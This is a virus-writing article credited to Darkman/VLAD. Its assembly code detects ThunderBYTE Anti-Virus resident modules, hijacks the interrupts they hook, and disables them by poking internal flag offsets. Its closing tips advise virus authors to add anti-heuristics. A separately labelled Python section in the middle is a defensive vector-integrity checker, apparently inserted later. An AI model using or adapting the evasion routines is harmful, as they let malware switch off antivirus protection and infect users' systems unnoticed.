T B A V M O N I T O R
Written by
Darkman/VLAD
Thanks for the idea to Conzouler and The Unforgiven of Immortal Riot
Read Immortal Riot's magazine Insane Reality
------------
Introduction
------------
This document is an example of how to detect, intercept and enable/disable
the memory resident programs of ThunderBYTE Anti-Virus: TbDriver, TbScanX,
TbCheck, TbMem, TbFile, TbDisk and TbLog.
-------------------------------
Thunderbyte B.V. about TbDriver
-------------------------------
Enable memory resident TBAV utilities: TbDriver
TbDriver does not provide much protection against viruses by itself, but
must be loaded in advance to enable the memory resident ThunderBYTE
Anti-Virus utilities, such as TbScanX, TbCheck, TbMem, TbFile and TbDisk
to perform properly. It also provides basic protection against ANSI
bombs and 'stealth' viruses.
-----------------------------
Interrupts hooked by TbDriver
-----------------------------
These interrupts are hooked by TbDriver:
INT 20h (DOS Program Terminate)
INT 21h (DOS Function call)
INT 27h (DOS Terminate and Stay Resident)
INT 29h (DOS Fast Console Output)
INT 2Fh (Software Multiplex)
----------------------
How to detect TbDriver
----------------------
The below code shows an example of how to detect TbDriver:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[29h*04h] ; Get address of interrupt 29h
cmp [si],2e53h ; TbDriver resident?
jne detectexit ; Not resident? Jump to detectexit
; Intercept TbDriver here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
This example must be used before interception of TbDriver.
-------------------------
How to intercept TbDriver
-------------------------
The below code shows an example of how to intercept all interrupts hooked
by TbDriver:
;------------------------------------------------------------=< cut here >=-
lea di,int29adr ; DI = offset of int29adr
add si,43h ; SI = offset of original INT 29h
movsw ; Move address of original INT 29h
movsw ; " " " " " "
lea di,int2fadr ; DI = offset of int2fadr
add si,17h ; SI = offset of original INT 2fh
movsw ; Move address of original INT 2fh
movsw ; " " " " " "
lea di,int21adr ; DI = offset of int21adr
add si,0c4h ; SI = offset of original INT 21h
movsw ; Move address of original INT 21h
movsw ; " " " " " "
mov ds,ax ; DS = segment of interrupt vectors
mov word ptr ds:[20h*04h],offset int20h
mov ds:[20h*04h+02h],es ; Intercept interrupt 20h
mov word ptr ds:[21h*04h],offset int21h
mov ds:[21h*04h+02h],es ; Intercept interrupt 21h
mov word ptr ds:[27h*04h],offset int27h
mov ds:[27h*04h+02h],es ; Intercept interrupt 27h
mov word ptr ds:[29h*04h],offset int29h
mov ds:[29h*04h+02h],es ; Intercept interrupt 29h
mov word ptr ds:[2fh*04h],offset int2fh
mov ds:[2fh*04h+02h],es ; Intercept interrupt 2fh
;------------------------------------------------------------=< cut here >=-
--------------------------------------------------------
Necessary procedures and variables to intercept TbDriver
--------------------------------------------------------
These procedures and variables are necessary to emulate the original
interrupts:
;------------------------------------------------------------=< cut here >=-
int20h proc near ; DOS Program Terminate
xor ax,ax ; Terminate program
endp
int21h proc near ; DOS Function call
db 0eah ; Object code of jump far
int21adr dd ? ; Address of interrupt 21h
endp
int27h proc near ; DOS Terminate and Stay Resident
mov ah,31h ; Terminate and stay resident
mov cl,04h ; Multiply by paragraphs
shr dx,cl ; Calculate paragraphs
inc dx ; Increase DX
jmp short int21h
endp
int29h proc near ; DOS Fast Console Output
db 0eah ; Object code of jump far
int29adr dd ? ; Address of interrupt 29h
endp
int2fh proc near ; Software Multiplex
db 0eah ; Object code of jump far
int2fadr dd ? ; Address of interrupt 2fh
endp
;------------------------------------------------------------=< cut here >=-
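The two things the TbDriver section relies on are the layout of the real-mode interrupt vector table (four bytes per vector, offset word then segment word, so INT n lives at 0000:n*4) and the far-jump trampoline (opcode 0EAh followed by offset and segment) that the int21h/int29h/int2fh procedures use to pass control on to the original handler. Seen from the other side, a resident monitor can use exactly the same facts to notice that one of its hooks has been redirected or that the code at its own entry point has been patched. The following Python is an added example written for this page; it is not code from the article, from VLAD, or from Thunderbyte B.V. It runs against a constructed 1 MiB memory image: the segment 1234h, the entry offsets, the two-byte signature 509Ch (pushf / push ax) and the intruder segment 2000h are all made up for the illustration, and the hypothetical helper names (check_vectors, follow_far_jumps, build_demo_memory) are mine. Only the IVT layout and the 0EAh far-jump encoding come from the page.

```python
"""Interrupt-vector integrity check for a DOS-style IVT (added example).

A resident monitor records, for every interrupt it hooks, where the vector
points and the first word of its own handler.  Later it re-reads the IVT and
reports vectors that were redirected (and whether the new target chains back
to the monitor through far-jump trampolines) or handler entries that were
patched in place.  All addresses and bytes below are constructed."""
import struct

FAR_JMP = 0xEA                      # opcode of "jmp far ptr seg:off"
MONITOR_SEG = 0x1234                # constructed: segment of the resident monitor
HOOKS = {0x21: 0x0100, 0x29: 0x0200, 0x2F: 0x0300}   # constructed entry offsets
SIGNATURE = b"\x9c\x50"             # constructed first bytes: pushf / push ax
INTRUDER_SEG = 0x2000               # constructed: segment of a later resident program


def linear(seg, off):
    """Real-mode segment:offset to a 20-bit linear address."""
    return ((seg << 4) + off) & 0xFFFFF


def read_vector(mem, int_no):
    """Return (seg, off) stored in IVT slot int_no (offset word first)."""
    off, seg = struct.unpack_from("<HH", mem, int_no * 4)
    return seg, off


def write_vector(mem, int_no, seg, off):
    struct.pack_into("<HH", mem, int_no * 4, off, seg)


def follow_far_jumps(mem, seg, off, limit=8):
    """Walk a chain of far-jump trampolines (EAh off seg) starting at seg:off.

    Returns the list of (seg, off) visited; the first entry is the vector's
    own target.  Stops at the first byte that is not a far jump, on a loop,
    or after `limit` hops."""
    chain = [(seg, off)]
    for _ in range(limit):
        lin = linear(seg, off)
        if mem[lin] != FAR_JMP:
            break
        off, seg = struct.unpack_from("<HH", mem, lin + 1)
        if (seg, off) in chain:          # trampoline loop: give up
            break
        chain.append((seg, off))
    return chain


def check_vectors(mem, expected):
    """expected maps int_no -> (seg, off, sig_word) as recorded at hook time.

    Returns a list of findings (empty means every hook is intact).  A vector
    that no longer points at the monitor is 'redirected'; chains_back tells
    whether the new handler still reaches the monitor via far jumps.  A vector
    that still points at the monitor but whose first word changed is
    'patched'."""
    findings = []
    for int_no, (exp_seg, exp_off, exp_sig) in sorted(expected.items()):
        seg, off = read_vector(mem, int_no)
        if (seg, off) != (exp_seg, exp_off):
            chain = follow_far_jumps(mem, seg, off)
            findings.append({"int": int_no, "kind": "redirected",
                             "target": (seg, off),
                             "chains_back": (exp_seg, exp_off) in chain})
            continue
        sig = struct.unpack_from("<H", mem, linear(seg, off))[0]
        if sig != exp_sig:
            findings.append({"int": int_no, "kind": "patched",
                             "target": (seg, off), "chains_back": False})
    return findings


def build_demo_memory():
    """Constructed image: the monitor hooks INT 21h/29h/2Fh, then a later
    program takes INT 29h through a trampoline that returns to the monitor
    and takes INT 21h with code that never reaches the monitor at all."""
    mem = bytearray(1 << 20)
    expected = {}
    sig_word = struct.unpack("<H", SIGNATURE)[0]
    for int_no, off in HOOKS.items():
        entry = linear(MONITOR_SEG, off)
        mem[entry:entry + 2] = SIGNATURE
        write_vector(mem, int_no, MONITOR_SEG, off)
        expected[int_no] = (MONITOR_SEG, off, sig_word)
    # INT 29h: far-jump trampoline back to the monitor's original entry.
    tramp = linear(INTRUDER_SEG, 0x0010)
    mem[tramp] = FAR_JMP
    struct.pack_into("<HH", mem, tramp + 1, HOOKS[0x29], MONITOR_SEG)
    write_vector(mem, 0x29, INTRUDER_SEG, 0x0010)
    # INT 21h: handler is just an iret, so the monitor is bypassed entirely.
    mem[linear(INTRUDER_SEG, 0x0020)] = 0xCF
    write_vector(mem, 0x21, INTRUDER_SEG, 0x0020)
    return mem, expected


def report(findings):
    """Human-readable one-liners for each finding."""
    lines = []
    for f in findings:
        seg, off = f["target"]
        state = "chains back to monitor" if f["chains_back"] else "monitor bypassed"
        lines.append(f"INT {f['int']:02X}h {f['kind']}: now {seg:04X}:{off:04X}, {state}")
    return lines


if __name__ == "__main__":
    image, hooks = build_demo_memory()
    for line in report(check_vectors(image, hooks)):
        print(line)
```

Run stand-alone, the demo reports INT 21h as redirected with the monitor bypassed and INT 29h as redirected but still chaining back, while INT 2Fh is silent because its vector and entry bytes are unchanged. The distinction matters for a monitor: a chained hook still sees every call, a bypassed one sees none, which is the situation the TbDriver interception above creates for INT 21h.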
------------------------------
Thunderbyte B.V. about TbScanX
------------------------------
Automatic scanning: TbScanX
TbScanX is the memory resident version of TbScan. This signature scanner
remains resident in memory and automatically scans those files which are
being executed, copied, de-archived, downloaded, etc. TbScanX does not
require much memory. It can swap itself into expanded, XMS, or high
memory, using only 1Kb of conventional memory.
----------------------------
Interrupts hooked by TbScanX
----------------------------
These interrupts are hooked by TbScanX:
INT 13h (BIOS Fixed disk/FDD Services)
INT 2Fh (Software Multiplex)
It may look like the interrupt below is hooked, because it points to the
code of TbScanX, but it is NOT hooked:
INT E1h (BASIC Reserved)
---------------------
How to detect TbScanX
---------------------
The below code shows an example of how to detect TbScanX:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[13h*04h] ; Get address of interrupt 13h
cmp [si],2e9ch ; TbScanX resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable or intercept TbScanX here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You probably can't detect or intercept TbScanX if TbDisk hooked the
interrupt before or after it, so please detect TbDisk both before and after.
This example must be used before enabling/disabling or intercepting TbScanX.
------------------------
How to intercept TbScanX
------------------------
The below code shows an example of how to intercept interrupt 13h, which is
hooked by TbScanX:
;------------------------------------------------------------=< cut here >=-
lea di,int13adr ; DI = offset of int13adr
add si,66h ; SI = offset of original INT 13h
movsw ; Move address of original INT 13h
movsw ; " " " " " "
mov ds,ax ; DS = segment of interrupt vectors
mov word ptr ds:[13h*04h],offset int13h
mov ds:[13h*04h+02h],es ; Intercept interrupt 13h
;------------------------------------------------------------=< cut here >=-
It is easier to intercept interrupt 2Fh via TbDriver; do that instead of
intercepting it via TbScanX.
-------------------------------------------------------
Necessary procedures and variables to intercept TbScanX
-------------------------------------------------------
These procedures and variables are necessary to emulate the original
interrupts:
;------------------------------------------------------------=< cut here >=-
int13h proc near ; BIOS Fixed disk/FDD Services
db 0eah ; Object code of jump far
int13adr dd ? ; Address of interrupt 13h
endp
;------------------------------------------------------------=< cut here >=-
---------------------
How to enable TbScanX
---------------------
The below code shows an example of how to enable TbScanX:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-12ch],00h
;------------------------------------------------------------=< cut here >=-
----------------------
How to disable TbScanX
----------------------
The below code shows an example of how to disable TbScanX:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-12ch],19h
;------------------------------------------------------------=< cut here >=-
------------------------------
Thunderbyte B.V. about TbCheck
------------------------------
Check while loading: TbCheck
TbCheck is a memory resident integrity checker. This program remains
resident in memory and checks automatically every file just before it is
being executed. TbCheck uses a fast integrity checking method, consuming
only 400 bytes of memory. It can be configured to reject files with
incorrect checksums, and/or to reject files that do not have a corres-
ponding Anti-Vir.Dat record.
----------------------------
Interrupts hooked by TbCheck
----------------------------
TbCheck does not hook any interrupts, so there is no need to intercept it.
---------------------
How to detect TbCheck
---------------------
The below code shows an example of how to detect TbCheck:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[21h*04h] ; Get address of interrupt 21h
lds si,ds:[si+75h] ; Get address of TbCheck
cmp [si],3d9ch ; TbCheck resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable TbCheck here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You probably can't detect TbCheck if TbScanX, TbMem, TbFile, TbDisk or
TbLog hooked the interrupt before it, so please detect them first.
This example must be used before enabling/disabling TbCheck.
---------------------
How to enable TbCheck
---------------------
The below code shows an example of how to enable TbCheck:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-69h],00h
;------------------------------------------------------------=< cut here >=-
----------------------
How to disable TbCheck
----------------------
The below code shows an example of how to disable TbCheck:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-69h],01h
;------------------------------------------------------------=< cut here >=-
----------------------------
Thunderbyte B.V. about TbMem
----------------------------
Controlling memory: TbMem
TbMem detects attempts from programs to remain resident in memory, and
ensures that no program can remain resident in memory without permis-
sion. Since most viruses remain resident in memory, this is a powerful
weapon against all such viruses, known or unknown. Permission informa-
tion is maintained in the Anti-Vir.Dat files. TbMem also protects your
CMOS memory against unwanted modifications.
--------------------------
Interrupts hooked by TbMem
--------------------------
These interrupts are hooked by TbMem:
INT 09h (IRQ 1 Keyboard)
INT 2Fh (Software Multiplex)
-------------------
How to detect TbMem
-------------------
The below code shows an example of how to detect TbMem:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[09h*04h] ; Get address of interrupt 09h
cmp [si],2e50h ; TbMem resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable or intercept TbMem here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
This example must be used before enabling/disabling or intercepting TbMem.
----------------------
How to intercept TbMem
----------------------
The below code shows an example of how to intercept interrupt 09h, which is
hooked by TbMem:
;------------------------------------------------------------=< cut here >=-
lea di,int09adr ; DI = offset of int09adr
add si,3ch ; SI = offset of original INT 09h
movsw ; Move address of original INT 09h
movsw ; " " " " " "
mov ds,ax ; DS = segment of interrupt vectors
mov word ptr ds:[09h*04h],offset int09h
mov ds:[09h*04h+02h],es ; Intercept interrupt 09h
;------------------------------------------------------------=< cut here >=-
It is easier to intercept interrupt 2Fh via TbDriver; do that instead of
intercepting it via TbMem.
-----------------------------------------------------
Necessary procedures and variables to intercept TbMem
-----------------------------------------------------
These procedures and variables are necessary to emulate the original
interrupts:
;------------------------------------------------------------=< cut here >=-
int09h proc near ; IRQ 1 Keyboard
db 0eah ; Object code of jump far
int09adr dd ? ; Address of interrupt 09h
endp
;------------------------------------------------------------=< cut here >=-
-------------------
How to enable TbMem
-------------------
The below code shows an example of how to enable TbMem:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-253h],28h
;------------------------------------------------------------=< cut here >=-
--------------------
How to disable TbMem
--------------------
The below code shows an example of how to disable TbMem:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-253h],29h
;------------------------------------------------------------=< cut here >=-
-----------------------------
Thunderbyte B.V. about TbFile
-----------------------------
Preventing infection: TbFile
TbFile detects attempts from programs to infect other programs. It also
guards read-only attributes, detects illegal time-stamps, etc. It will
make sure that no virus succeeds in infecting programs.
---------------------------
Interrupts hooked by TbFile
---------------------------
TbFile does not hook any interrupts, so there is no need to intercept it.
--------------------
How to detect TbFile
--------------------
The below code shows an example of how to detect TbFile:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[21h*04h] ; Get address of interrupt 21h
lds si,ds:[si+75h] ; Get address of TbFile
cmp [si],2e9ch ; TbFile resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable TbFile here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You probably can't detect TbFile if TbScanX, TbCheck, TbMem, TbDisk or
TbLog hooked the interrupt before it, so please detect them first.
This example must be used before enabling/disabling TbFile.
--------------------
How to enable TbFile
--------------------
The below code shows an example of how to enable TbFile:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0c5h],00h
;------------------------------------------------------------=< cut here >=-
---------------------
How to disable TbFile
---------------------
The below code shows an example of how to disable TbFile:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0c5h],01h
;------------------------------------------------------------=< cut here >=-
-----------------------------
Thunderbyte B.V. about TbDisk
-----------------------------
Protecting the disk: TbDisk
TbDisk is a disk guard program which detects attempts from programs to
write directly to disk (without using DOS), attempts to format, etc.,
and makes sure that no malicious program will succeed in destroying your
data. This utility also traps tunneling and direct calls into the BIOS
code. Permission information about the rare programs that write directly
and/or format the disk is maintained in the Anti-Vir.Dat files.
---------------------------
Interrupts hooked by TbDisk
---------------------------
These interrupts are hooked by TbDisk:
INT 13h (BIOS Fixed disk/FDD Services)
INT 15h (BIOS System Services)
INT 26h (DOS Absolute Disk Write)
INT 2Fh (Software Multiplex)
INT 40h (BIOS Diskette Service)
--------------------
How to detect TbDisk
--------------------
The below code shows an example of how to detect TbDisk:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[26h*04h] ; Get address of interrupt 26h
cmp [si],2e9ch ; TbDisk resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable or intercept TbDisk here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You probably can't detect or intercept TbDisk if TbScanX hooked the
interrupt before or after it, so please detect TbScanX both before and after.
This example must be used before enabling/disabling or intercepting TbDisk.
-----------------------
How to intercept TbDisk
-----------------------
The below code shows an example of how to intercept interrupts 13h, 15h, 26h
and 40h, which are hooked by TbDisk:
;------------------------------------------------------------=< cut here >=-
lea di,int26adr ; DI = offset of int26adr
add si,0fh ; SI = offset of original INT 26h
movsw ; Move address of original INT 26h
movsw ; " " " " " "
lea di,int40adr ; DI = offset of int40adr
add si,18h ; SI = offset of original INT 40h
movsw ; Move address of original INT 40h
movsw ; " " " " " "
lea di,int13adr ; DI = offset of int13adr
add si,2bh ; SI = offset of original INT 13h
movsw ; Move address of original INT 13h
movsw ; " " " " " "
lea di,int15adr ; DI = offset of int15adr
add si,18h ; SI = offset of original INT 15h
movsw ; Move address of original INT 15h
movsw ; " " " " " "
mov ds,ax ; DS = segment of interrupt vectors
mov word ptr ds:[13h*04h],offset int13h
mov ds:[13h*04h+02h],es ; Intercept interrupt 13h
mov word ptr ds:[15h*04h],offset int15h
mov ds:[15h*04h+02h],es ; Intercept interrupt 15h
mov word ptr ds:[26h*04h],offset int26h
mov ds:[26h*04h+02h],es ; Intercept interrupt 26h
mov word ptr ds:[40h*04h],offset int40h
mov ds:[40h*04h+02h],es ; Intercept interrupt 40h
;------------------------------------------------------------=< cut here >=-
It is easier to intercept interrupt 2Fh via TbDriver; do that instead of
intercepting it via TbDisk.
------------------------------------------------------
Necessary procedures and variables to intercept TbDisk
------------------------------------------------------
These procedures and variables are necessary to emulate the original
interrupts:
;------------------------------------------------------------=< cut here >=-
int13h proc near ; BIOS Fixed disk/FDD Services
db 0eah ; Object code of jump far
int13adr dd ? ; Address of interrupt 13h
endp
int15h proc near ; BIOS System Services
db 0eah ; Object code of jump far
int15adr dd ? ; Address of interrupt 15h
endp
int26h proc near ; DOS Absolute Disk Write
db 0eah ; Object code of jump far
int26adr dd ? ; Address of interrupt 26h
endp
int40h proc near ; BIOS Diskette Service
db 0eah ; Object code of jump far
int40adr dd ? ; Address of interrupt 40h
endp
;------------------------------------------------------------=< cut here >=-
--------------------
How to enable TbDisk
--------------------
The below code shows an example of how to enable TbDisk:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0bah],00h
;------------------------------------------------------------=< cut here >=-
---------------------
How to disable TbDisk
---------------------
The below code shows an example of how to disable TbDisk:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0bah],01h
;------------------------------------------------------------=< cut here >=-
----------------------------
Thunderbyte B.V. about TbLog
----------------------------
The purpose of TbLog
TbLog is a TBAV log file utility. It writes a record into a log file
whenever one of the resident TBAV utilities pops up with an alert
message. Also when TbScan detects a virus a record will be written.
--------------------------
Interrupts hooked by TbLog
--------------------------
This interrupt is hooked by TbLog:
INT 2Fh (Software Multiplex)
It is easier to intercept interrupt 2Fh via TbDriver; do that instead of
intercepting it via TbLog.
-------------------
How to detect TbLog
-------------------
The below code shows an example of how to detect TbLog:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[2fh*04h] ; Get address of interrupt 2fh
cmp [si],0fd3dh ; TbLog resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable TbLog here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You probably can't detect TbLog if TbScanX, TbMem or TbDisk hooked the
interrupt before it, so please detect them first.
This example must be used before enabling/disabling TbLog.
-------------------
How to enable TbLog
-------------------
The below code shows an example of how to enable TbLog:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0a2h],00h
;------------------------------------------------------------=< cut here >=-
--------------------
How to disable TbLog
--------------------
The below code shows an example of how to disable TbLog:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0a2h],01h
;------------------------------------------------------------=< cut here >=-
---------------------
Final tips and tricks
---------------------
- These examples were tested with ThunderBYTE Anti-Virus v6.31.
- Only intercept those interrupts the virus uses.
- Use a lot of anti-heuristics, so other programs can't find the virus either.
- Remember to optimize your code.